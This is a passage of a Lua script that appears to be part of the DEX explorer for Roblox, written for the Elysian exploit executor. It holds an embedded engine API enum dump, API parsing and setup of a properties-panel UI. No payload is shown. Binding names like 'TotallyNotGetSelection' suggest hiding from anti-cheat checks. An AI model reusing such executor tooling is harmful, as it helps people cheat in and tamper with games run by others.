,"Value":3,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level04","tags":[],"Value":4,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level05","tags":[],"Value":5,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level06","tags":[],"Value":6,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level07","tags":[],"Value":7,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level08","tags":[],"Value":8,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level09","tags":[],"Value":9,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level10","tags":[],"Value":10,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level11","tags":[],"Value":11,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level12","tags":[],"Value":12,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level13","tags":[],"Value":13,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level14","tags":[],"Value":14,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level15","tags":[],"Value":15,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level16","tags":[],"Value":16,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level17","tags":[],"Value":17,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level18","tags":[],"Value":18,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level19","tags":[],"Value":19,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level20","tags":[],"Value":20,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level21","tags":[],"Value":21,"Enum":"QualityLevel"},{"type":"Enum","Name":"RenderPriority","tags":[]},{"type":"EnumItem","Name":"First","tags":[],"Value":0,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Input","tags":[],"Value":100,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Camera","tags":[],"Value":200,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Character","tags":[],"Value":300,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Last","tags":[],"Value":2000,"Enum":"RenderPriority"},{"type":"Enum","Name":"Resolution","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"Resolution"},{"type":"EnumItem","Name":"720x526","tags":[],"Value":1,"Enum":"Resolution"},{"type":"EnumItem","Name":"800x600","tags":[],"Value":2,"Enum":"Resolution"},{"type":"EnumItem","Name":"1024x600","tags":[],"Value":3,"Enum":"Resolution"},{"type":"EnumItem","Name":"1024x768","tags":[],"Value":4,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x720","tags":[],"Value":5,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x768","tags":[],"Value":6,"Enum":"Resolution"},{"type":"EnumItem","Name":"1152x864","tags":[],"Value":7,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x800","tags":[],"Value":8,"Enum":"Resolution"},{"type":"EnumItem","Name":"1360x768","tags":[],"Value":9,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x960","tags":[],"Value":10,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x1024","tags":[],"Value":11,"Enum":"Resolution"},{"type":"EnumItem","Name":"1440x900","tags":[],"Value":12,"Enum":"Resolution"},{"type":"EnumItem","Name":"1600x900","tags":[],"Value":13,"Enum":"Resolution"},{"type":"EnumItem","Name":"1600x1024","tags":[],"Value":14,"Enum":"Resolution"},{"type":"EnumItem","Name":"1600x1200","tags":[],"Value":15,"Enum":"Resolution"},{"type":"EnumItem","Name":"1680x1050","tags":[],"Value":16,"Enum":"Resolution"},{"type":"EnumItem","Name":"1920x1080","tags":[],"Value":17,"Enum":"Resolution"},{"type":"EnumItem","Name":"1920x1200","tags":[],"Value":18,"Enum":"Resolution"},{"type":"Enum","Name":"ReverbType","tags":[]},{"type":"EnumItem","Name":"NoReverb","tags":[],"Value":0,"Enum":"ReverbType"},{"type":"EnumItem","Name":"GenericReverb","tags":[],"Value":1,"Enum":"ReverbType"},{"type":"EnumItem","Name":"PaddedCell","tags":[],"Value":2,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Room","tags":[],"Value":3,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Bathroom","tags":[],"Value":4,"Enum":"ReverbType"},{"type":"EnumItem","Name":"LivingRoom","tags":[],"Value":5,"Enum":"ReverbType"},{"type":"EnumItem","Name":"StoneRoom","tags":[],"Value":6,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Auditorium","tags":[],"Value":7,"Enum":"ReverbType"},{"type":"EnumItem","Name":"ConcertHall","tags":[],"Value":8,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Cave","tags":[],"Value":9,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Arena","tags":[],"Value":10,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Hangar","tags":[],"Value":11,"Enum":"ReverbType"},{"type":"EnumItem","Name":"CarpettedHallway","tags":[],"Value":12,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Hallway","tags":[],"Value":13,"Enum":"ReverbType"},{"type":"EnumItem","Name":"StoneCorridor","tags":[],"Value":14,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Alley","tags":[],"Value":15,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Forest","tags":[],"Value":16,"Enum":"ReverbType"},{"type":"EnumItem","Name":"City","tags":[],"Value":17,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Mountains","tags":[],"Value":18,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Quarry","tags":[],"Value":19,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Plain","tags":[],"Value":20,"Enum":"ReverbType"},{"type":"EnumItem","Name":"ParkingLot","tags":[],"Value":21,"Enum":"ReverbType"},{"type":"EnumItem","Name":"SewerPipe","tags":[],"Value":22,"Enum":"ReverbType"},{"type":"EnumItem","Name":"UnderWater","tags":[],"Value":23,"Enum":"ReverbType"},{"type":"Enum","Name":"RollOffMode","tags":[]},{"type":"EnumItem","Name":"Inverse","tags":[],"Value":0,"Enum":"RollOffMode"},{"type":"EnumItem","Name":"Linear","tags":[],"Value":1,"Enum":"RollOffMode"},{"type":"Enum","Name":"RotationType","tags":[]},{"type":"EnumItem","Name":"MovementRelative","tags":[],"Value":0,"Enum":"RotationType"},{"type":"EnumItem","Name":"CameraRelative","tags":[],"Value":1,"Enum":"RotationType"},{"type":"Enum","Name":"RuntimeUndoBehavior","tags":[]},{"type":"EnumItem","Name":"Aggregate","tags":[],"Value":0,"Enum":"RuntimeUndoBehavior"},{"type":"EnumItem","Name":"Snapshot","tags":[],"Value":1,"Enum":"RuntimeUndoBehavior"},{"type":"EnumItem","Name":"Hybrid","tags":[],"Value":2,"Enum":"RuntimeUndoBehavior"},{"type":"Enum","Name":"SaveFilter","tags":[]},{"type":"EnumItem","Name":"SaveAll","tags":[],"Value":2,"Enum":"SaveFilter"},{"type":"EnumItem","Name":"SaveWorld","tags":[],"Value":0,"Enum":"SaveFilter"},{"type":"EnumItem","Name":"SaveGame","tags":[],"Value":1,"Enum":"SaveFilter"},{"type":"Enum","Name":"SavedQualitySetting","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel1","tags":[],"Value":1,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel2","tags":[],"Value":2,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel3","tags":[],"Value":3,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel4","tags":[],"Value":4,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel5","tags":[],"Value":5,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel6","tags":[],"Value":6,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel7","tags":[],"Value":7,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel8","tags":[],"Value":8,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel9","tags":[],"Value":9,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel10","tags":[],"Value":10,"Enum":"SavedQualitySetting"},{"type":"Enum","Name":"ScaleType","tags":[]},{"type":"EnumItem","Name":"Stretch","tags":[],"Value":0,"Enum":"ScaleType"},{"type":"EnumItem","Name":"Slice","tags":[],"Value":1,"Enum":"ScaleType"},{"type":"Enum","Name":"SizeConstraint","tags":[]},{"type":"EnumItem","Name":"RelativeXY","tags":[],"Value":0,"Enum":"SizeConstraint"},{"type":"EnumItem","Name":"RelativeXX","tags":[],"Value":1,"Enum":"SizeConstraint"},{"type":"EnumItem","Name":"RelativeYY","tags":[],"Value":2,"Enum":"SizeConstraint"},{"type":"Enum","Name":"SleepAdjustMethod","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"SleepAdjustMethod"},{"type":"EnumItem","Name":"LastSample","tags":[],"Value":1,"Enum":"SleepAdjustMethod"},{"type":"EnumItem","Name":"AverageInterval","tags":[],"Value":2,"Enum":"SleepAdjustMethod"},{"type":"Enum","Name":"SoundType","tags":[]},{"type":"EnumItem","Name":"NoSound","tags":[],"Value":0,"Enum":"SoundType"},{"type":"EnumItem","Name":"Boing","tags":[],"Value":1,"Enum":"SoundType"},{"type":"EnumItem","Name":"Bomb","tags":[],"Value":2,"Enum":"SoundType"},{"type":"EnumItem","Name":"Break","tags":[],"Value":3,"Enum":"SoundType"},{"type":"EnumItem","Name":"Click","tags":[],"Value":4,"Enum":"SoundType"},{"type":"EnumItem","Name":"Clock","tags":[],"Value":5,"Enum":"SoundType"},{"type":"EnumItem","Name":"Slingshot","tags":[],"Value":6,"Enum":"SoundType"},{"type":"EnumItem","Name":"Page","tags":[],"Value":7,"Enum":"SoundType"},{"type":"EnumItem","Name":"Ping","tags":[],"Value":8,"Enum":"SoundType"},{"type":"EnumItem","Name":"Snap","tags":[],"Value":9,"Enum":"SoundType"},{"type":"EnumItem","Name":"Splat","tags":[],"Value":10,"Enum":"SoundType"},{"type":"EnumItem","Name":"Step","tags":[],"Value":11,"Enum":"SoundType"},{"type":"EnumItem","Name":"StepOn","tags":[],"Value":12,"Enum":"SoundType"},{"type":"EnumItem","Name":"Swoosh","tags":[],"Value":13,"Enum":"SoundType"},{"type":"EnumItem","Name":"Victory","tags":[],"Value":14,"Enum":"SoundType"},{"type":"Enum","Name":"SpecialKey","tags":[]},{"type":"EnumItem","Name":"Insert","tags":[],"Value":0,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"Home","tags":[],"Value":1,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"End","tags":[],"Value":2,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"PageUp","tags":[],"Value":3,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"PageDown","tags":[],"Value":4,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"ChatHotkey","tags":[],"Value":5,"Enum":"SpecialKey"},{"type":"Enum","Name":"Status","tags":[]},{"type":"EnumItem","Name":"Poison","tags":["deprecated"],"Value":0,"Enum":"Status"},{"type":"EnumItem","Name":"Confusion","tags":["deprecated"],"Value":1,"Enum":"Status"},{"type":"Enum","Name":"Stuff","tags":[]},{"type":"EnumItem","Name":"Heads","tags":[],"Value":0,"Enum":"Stuff"},{"type":"EnumItem","Name":"Faces","tags":[],"Value":1,"Enum":"Stuff"},{"type":"EnumItem","Name":"Hats","tags":[],"Value":2,"Enum":"Stuff"},{"type":"EnumItem","Name":"TShirts","tags":[],"Value":3,"Enum":"Stuff"},{"type":"EnumItem","Name":"Shirts","tags":[],"Value":4,"Enum":"Stuff"},{"type":"EnumItem","Name":"Pants","tags":[],"Value":5,"Enum":"Stuff"},{"type":"EnumItem","Name":"Gears","tags":[],"Value":6,"Enum":"Stuff"},{"type":"EnumItem","Name":"Torsos","tags":[],"Value":7,"Enum":"Stuff"},{"type":"EnumItem","Name":"LeftArms","tags":[],"Value":8,"Enum":"Stuff"},{"type":"EnumItem","Name":"RightArms","tags":[],"Value":9,"Enum":"Stuff"},{"type":"EnumItem","Name":"LeftLegs","tags":[],"Value":10,"Enum":"Stuff"},{"type":"EnumItem","Name":"RightLegs","tags":[],"Value":11,"Enum":"Stuff"},{"type":"EnumItem","Name":"Bodies","tags":[],"Value":12,"Enum":"Stuff"},{"type":"EnumItem","Name":"Costumes","tags":[],"Value":13,"Enum":"Stuff"},{"type":"Enum","Name":"Style","tags":[]},{"type":"EnumItem","Name":"AlternatingSupports","tags":[],"Value":0,"Enum":"Style"},{"type":"EnumItem","Name":"BridgeStyleSupports","tags":[],"Value":1,"Enum":"Style"},{"type":"EnumItem","Name":"NoSupports","tags":[],"Value":2,"Enum":"Style"},{"type":"Enum","Name":"SurfaceConstraint","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"SurfaceConstraint"},{"type":"EnumItem","Name":"Hinge","tags":[],"Value":1,"Enum":"SurfaceConstraint"},{"type":"EnumItem","Name":"SteppingMotor","tags":[],"Value":2,"Enum":"SurfaceConstraint"},{"type":"EnumItem","Name":"Motor","tags":[],"Value":3,"Enum":"SurfaceConstraint"},{"type":"Enum","Name":"SurfaceType","tags":[]},{"type":"EnumItem","Name":"Smooth","tags":[],"Value":0,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Glue","tags":[],"Value":1,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Weld","tags":[],"Value":2,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Studs","tags":[],"Value":3,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Inlet","tags":[],"Value":4,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Universal","tags":[],"Value":5,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Hinge","tags":[],"Value":6,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Motor","tags":[],"Value":7,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"SteppingMotor","tags":[],"Value":8,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Unjoinable","tags":[],"Value":9,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"SmoothNoOutlines","tags":[],"Value":10,"Enum":"SurfaceType"},{"type":"Enum","Name":"SwipeDirection","tags":[]},{"type":"EnumItem","Name":"Right","tags":[],"Value":0,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"Left","tags":[],"Value":1,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"Up","tags":[],"Value":2,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"Down","tags":[],"Value":3,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"None","tags":[],"Value":4,"Enum":"SwipeDirection"},{"type":"Enum","Name":"TeleportState","tags":[]},{"type":"EnumItem","Name":"RequestedFromServer","tags":[],"Value":0,"Enum":"TeleportState"},{"type":"EnumItem","Name":"Started","tags":[],"Value":1,"Enum":"TeleportState"},{"type":"EnumItem","Name":"WaitingForServer","tags":[],"Value":2,"Enum":"TeleportState"},{"type":"EnumItem","Name":"Failed","tags":[],"Value":3,"Enum":"TeleportState"},{"type":"EnumItem","Name":"InProgress","tags":[],"Value":4,"Enum":"TeleportState"},{"type":"Enum","Name":"TeleportType","tags":[]},{"type":"EnumItem","Name":"ToPlace","tags":[],"Value":0,"Enum":"TeleportType"},{"type":"EnumItem","Name":"ToInstance","tags":[],"Value":1,"Enum":"TeleportType"},{"type":"EnumItem","Name":"ToReservedServer","tags":[],"Value":2,"Enum":"TeleportType"},{"type":"Enum","Name":"TextXAlignment","tags":[]},{"type":"EnumItem","Name":"Left","tags":[],"Value":0,"Enum":"TextXAlignment"},{"type":"EnumItem","Name":"Center","tags":[],"Value":2,"Enum":"TextXAlignment"},{"type":"EnumItem","Name":"Right","tags":[],"Value":1,"Enum":"TextXAlignment"},{"type":"Enum","Name":"TextYAlignment","tags":[]},{"type":"EnumItem","Name":"Top","tags":[],"Value":0,"Enum":"TextYAlignment"},{"type":"EnumItem","Name":"Center","tags":[],"Value":1,"Enum":"TextYAlignment"},{"type":"EnumItem","Name":"Bottom","tags":[],"Value":2,"Enum":"TextYAlignment"},{"type":"Enum","Name":"ThreadPoolConfig","tags":[]},{"type":"EnumItem","Name":"Auto","tags":[],"Value":0,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore1","tags":[],"Value":101,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore2","tags":[],"Value":102,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore3","tags":[],"Value":103,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore4","tags":[],"Value":104,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads1","tags":[],"Value":1,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads2","tags":[],"Value":2,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads3","tags":[],"Value":3,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads4","tags":[],"Value":4,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads8","tags":[],"Value":8,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads16","tags":[],"Value":16,"Enum":"ThreadPoolConfig"},{"type":"Enum","Name":"ThrottlingPriority","tags":[]},{"type":"EnumItem","Name":"Extreme","tags":[],"Value":2,"Enum":"ThrottlingPriority"},{"type":"EnumItem","Name":"ElevatedOnServer","tags":[],"Value":1,"Enum":"ThrottlingPriority"},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"ThrottlingPriority"},{"type":"Enum","Name":"TickCountSampleMethod","tags":[]},{"type":"EnumItem","Name":"Fast","tags":[],"Value":0,"Enum":"TickCountSampleMethod"},{"type":"EnumItem","Name":"Benchmark","tags":[],"Value":1,"Enum":"TickCountSampleMethod"},{"type":"EnumItem","Name":"Precise","tags":[],"Value":2,"Enum":"TickCountSampleMethod"},{"type":"Enum","Name":"TopBottom","tags":[]},{"type":"EnumItem","Name":"Top","tags":[],"Value":0,"Enum":"TopBottom"},{"type":"EnumItem","Name":"Center","tags":[],"Value":1,"Enum":"TopBottom"},{"type":"EnumItem","Name":"Bottom","tags":[],"Value":2,"Enum":"TopBottom"},{"type":"Enum","Name":"TouchCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"TouchCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"TouchCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"TouchCameraMovementMode"},{"type":"Enum","Name":"TouchMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"Thumbstick","tags":[],"Value":1,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"DPad","tags":[],"Value":2,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"Thumbpad","tags":[],"Value":3,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":4,"Enum":"TouchMovementMode"},{"type":"Enum","Name":"TweenStatus","tags":[]},{"type":"EnumItem","Name":"Canceled","tags":[],"Value":0,"Enum":"TweenStatus"},{"type":"EnumItem","Name":"Completed","tags":[],"Value":1,"Enum":"TweenStatus"},{"type":"Enum","Name":"UiMessageType","tags":[]},{"type":"EnumItem","Name":"UiMessageError","tags":[],"Value":0,"Enum":"UiMessageType"},{"type":"EnumItem","Name":"UiMessageInfo","tags":[],"Value":1,"Enum":"UiMessageType"},{"type":"Enum","Name":"UploadSetting","tags":[]},{"type":"EnumItem","Name":"Never","tags":[],"Value":0,"Enum":"UploadSetting"},{"type":"EnumItem","Name":"Ask","tags":[],"Value":1,"Enum":"UploadSetting"},{"type":"EnumItem","Name":"Always","tags":[],"Value":2,"Enum":"UploadSetting"},{"type":"Enum","Name":"UserCFrame","tags":[]},{"type":"EnumItem","Name":"Head","tags":[],"Value":0,"Enum":"UserCFrame"},{"type":"EnumItem","Name":"LeftHand","tags":[],"Value":1,"Enum":"UserCFrame"},{"type":"EnumItem","Name":"RightHand","tags":[],"Value":2,"Enum":"UserCFrame"},{"type":"Enum","Name":"UserInputState","tags":[]},{"type":"EnumItem","Name":"Begin","tags":[],"Value":0,"Enum":"UserInputState"},{"type":"EnumItem","Name":"Change","tags":[],"Value":1,"Enum":"UserInputState"},{"type":"EnumItem","Name":"End","tags":[],"Value":2,"Enum":"UserInputState"},{"type":"EnumItem","Name":"Cancel","tags":[],"Value":3,"Enum":"UserInputState"},{"type":"EnumItem","Name":"None","tags":[],"Value":4,"Enum":"UserInputState"},{"type":"Enum","Name":"UserInputType","tags":[]},{"type":"EnumItem","Name":"MouseButton1","tags":[],"Value":0,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseButton2","tags":[],"Value":1,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseButton3","tags":[],"Value":2,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseWheel","tags":[],"Value":3,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseMovement","tags":[],"Value":4,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Touch","tags":[],"Value":7,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Keyboard","tags":[],"Value":8,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Focus","tags":[],"Value":9,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Accelerometer","tags":[],"Value":10,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gyro","tags":[],"Value":11,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad1","tags":[],"Value":12,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad2","tags":[],"Value":13,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad3","tags":[],"Value":14,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad4","tags":[],"Value":15,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad5","tags":[],"Value":16,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad6","tags":[],"Value":17,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad7","tags":[],"Value":18,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad8","tags":[],"Value":19,"Enum":"UserInputType"},{"type":"EnumItem","Name":"TextInput","tags":[],"Value":20,"Enum":"UserInputType"},{"type":"EnumItem","Name":"None","tags":[],"Value":21,"Enum":"UserInputType"},{"type":"Enum","Name":"VibrationMotor","tags":[]},{"type":"EnumItem","Name":"Large","tags":[],"Value":0,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"Small","tags":[],"Value":1,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"LeftTrigger","tags":[],"Value":2,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"RightTrigger","tags":[],"Value":3,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"LeftHand","tags":[],"Value":4,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"RightHand","tags":[],"Value":5,"Enum":"VibrationMotor"},{"type":"Enum","Name":"VideoQualitySettings","tags":[]},{"type":"EnumItem","Name":"LowResolution","tags":[],"Value":0,"Enum":"VideoQualitySettings"},{"type":"EnumItem","Name":"MediumResolution","tags":[],"Value":1,"Enum":"VideoQualitySettings"},{"type":"EnumItem","Name":"HighResolution","tags":[],"Value":2,"Enum":"VideoQualitySettings"},{"type":"Enum","Name":"WaterDirection","tags":[]},{"type":"EnumItem","Name":"NegX","tags":[],"Value":0,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"X","tags":[],"Value":1,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"NegY","tags":[],"Value":2,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"Y","tags":[],"Value":3,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"NegZ","tags":[],"Value":4,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"Z","tags":[],"Value":5,"Enum":"WaterDirection"},{"type":"Enum","Name":"WaterForce","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Small","tags":[],"Value":1,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Medium","tags":[],"Value":2,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Strong","tags":[],"Value":3,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Max","tags":[],"Value":4,"Enum":"WaterForce"}] ]===] return rawApiJson end function getCurrentApiJson() local jsonStr = nil if readfile and getelysianpath then if readfile(getelysianpath().."Xpl0rerApi.txt") then print("Api found in folder!") jsonStr = readfile(getelysianpath().."Xpl0rerApi.txt") return jsonStr end end local success, err = pcall(function() jsonStr = httpGet(apiUrl) print("Fetched json successfully") end) if success then print("Returning json") --print(jsonStr:sub(1,500)) return jsonStr else print("Error fetching json: " .. tostring(err)) print("Falling back to local copy") return getLocalApiJson() end end function splitStringIntoChunks(jsonStr) -- Splits up a string into a table with a given size local t = {} for i = 1, math.ceil(string.len(jsonStr)/maxChunkSize) do local str = jsonStr:sub((i-1)*maxChunkSize+1, i*maxChunkSize) table.insert(t, str) end return t end local jsonToParse = getCurrentApiJson() local apiChunks = splitStringIntoChunks(jsonToParse) function getRbxApi() --[[ Api.Classes Api.Enums Api.GetProperties(className) Api.IsEnum(valueType) --]] -- Services local HttpService = game:GetService("HttpService") local ServerStorage = game:GetService("ServerStorage") local ReplicatedStorage = game:GetService("ReplicatedStorage") -- Remotes --local Remotes = ReplicatedStorage:WaitForChild("OnlineStudio"):WaitForChild("Remotes") --local GetApiJsonFunction = Remotes:WaitForChild("GetApiJson") -- Functions local JsonDecode = function(s) return HttpService:JSONDecode(s) end local function GetApiRemoteFunction(index) if (apiChunks[index]) then return apiChunks[index], #apiChunks else print("Bad index for GetApiJson") return nil end end local function getApiJson() local apiTable = {} local firstPage, pageCount = GetApiRemoteFunction(1) table.insert(apiTable, firstPage) for i = 2, pageCount do --print("Fetching API page # " .. tostring(i)) local result = GetApiRemoteFunction(i) table.insert(apiTable, result) end return table.concat(apiTable) end local json = getApiJson() local apiDump = JsonDecode(json) local Classes = {} local Enums = {} local function sortAlphabetic(t, property) table.sort(t, function(x,y) return x[property] < y[property] end) end local function isEnum(name) return Enums[name] ~= nil end local function getProperties(className) local class = Classes[className] local properties = {} if not class then return properties end while class do for _,property in pairs(class.Properties) do table.insert(properties, property) end class = Classes[class.Superclass] end sortAlphabetic(properties, "Name") return properties end for _,item in pairs(apiDump) do local itemType = item.type -- Classes -- if (itemType == 'Class') then Classes[item.Name] = item item.Properties = {} item.Functions = {} item.YieldFunctions = {} item.Events = {} item.Callbacks = {} -- Members -- elseif (itemType == 'Property') then table.insert(Classes[item.Class].Properties, item) elseif (itemType == 'Function') then table.insert(Classes[item.Class].Functions, item) elseif (itemType == 'YieldFunction') then table.insert(Classes[item.Class].YieldFunctions, item) elseif (itemType == 'Event') then table.insert(Classes[item.Class].Events, item) elseif (itemType == 'Callback') then table.insert(Classes[item.Class].Callbacks, item) -- Enums -- elseif (itemType == 'Enum') then Enums[item.Name] = item item.EnumItems = {} elseif (itemType == 'EnumItem') then Enums[item.Enum].EnumItems[item.Name] = item end end return { Classes = Classes; Enums = Enums; GetProperties = getProperties; IsEnum = isEnum; } end -- Modules local Permissions = {CanEdit = true} local RbxApi = getRbxApi() --[[ RbxApi.Classes RbxApi.Enums RbxApi.GetProperties(className) RbxApi.IsEnum(valueType) --]] -- Styles local function CreateColor3(r, g, b) return Color3.new(r/255,g/255,b/255) end local Styles = { Font = Enum.Font.Arial; Margin = 5; Black = CreateColor3(0,0,0); White = CreateColor3(255,255,255); } local Row = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextXAlignment = Enum.TextXAlignment.Left; TextColor = Styles.Black; TextColorOver = Styles.White; TextLockedColor = CreateColor3(120,120,120); Height = 24; BorderColor = CreateColor3(216,216,216); BackgroundColor = Styles.White; BackgroundColorAlternate = CreateColor3(246,246,246); BackgroundColorMouseover = CreateColor3(211,224,244); TitleMarginLeft = 15; } local DropDown = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextColor = CreateColor3(0,0,0); TextColorOver = Styles.White; TextXAlignment = Enum.TextXAlignment.Left; Height = 16; BackColor = Styles.White; BackColorOver = CreateColor3(86,125,188); BorderColor = CreateColor3(216,216,216); BorderSizePixel = 2; ArrowColor = CreateColor3(160,160,160); ArrowColorOver = Styles.Black; } local BrickColors = { BoxSize = 13; BorderSizePixel = 1; BorderColor = CreateColor3(160,160,160); FrameColor = CreateColor3(160,160,160); Size = 20; Padding = 4; ColorsPerRow = 8; OuterBorder = 1; OuterBorderColor = Styles.Black; } wait(1) local Gui = D_E_X local PropertiesFrame = Gui:WaitForChild("PropertiesFrame") local ExplorerFrame = Gui:WaitForChild("ExplorerPanel") local bindGetSelection = ExplorerFrame.TotallyNotGetSelection local bindSelectionChanged = ExplorerFrame.TotallyNotSelectionChanged local bindGetApi = PropertiesFrame.GetApi local bindGetAwait = PropertiesFrame.GetAwaiting local bindSetAwait = PropertiesFrame.SetAwaiting local ContentUrl = ContentProvider.BaseUrl .. "asset/?id=" local SettingsRemote = Gui:WaitForChild("SettingsPanel"):WaitForChild("GetSetting") local propertiesSearch = PropertiesFrame.Header.TextBox local AwaitingObjectValue = false local AwaitingObjectObj local AwaitingObjectProp function searchingProperties() if propertiesSearch.Text ~= "" and propertiesSearch.Text ~= "Search Properties" then return true end return false end local function GetSelection() local selection = bindGetSelection:Invoke() if 